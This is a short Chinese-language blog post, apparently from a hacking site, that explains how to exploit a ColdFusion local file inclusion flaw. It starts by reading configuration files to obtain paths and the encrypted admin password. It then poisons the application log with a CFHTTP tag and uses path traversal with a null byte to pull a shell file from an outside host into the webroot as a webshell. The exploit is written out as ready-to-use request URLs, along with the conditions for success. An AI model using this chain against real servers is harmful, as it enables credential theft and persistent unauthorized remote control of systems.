cfm本地包含漏洞利用

分类:安全 | 2012-01-1 | 撸过 101 次
0人扯谈

1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码

2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL

http://www.webshell.cc/index.cfm?action=../../../../../../../../../../CFusionMX7/logs/application.log%00

 

http://www.webshell.cc/index.cfm?action=<CFHTTP METHOD=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#>

 

http://www.webshell.cc /index.cfm?action=……CFusionMX7logsapplication.log%00&u=http://www.pentest.cc/shell.txt&p=c:inetpubwwwroot&f=shell.cfm

 

 

成功条件:

1.WEB目录可写

2.coldfusion目录和web目录在同一个分区

3.多个牛人的群策群力

未解决的问题:

1.iis的日志会把空格变成+,不知道怎么绕过

2.coldfusion会把单引号和双引号加倍处理,不知道怎么绕过去(师傅也遇到这个问题了,哈哈)

本站内容均为原创,转载请务必保留署名与链接!
cfm本地包含漏洞利用:https://www.webshell.cc/2408.html
标签: ,

相关日志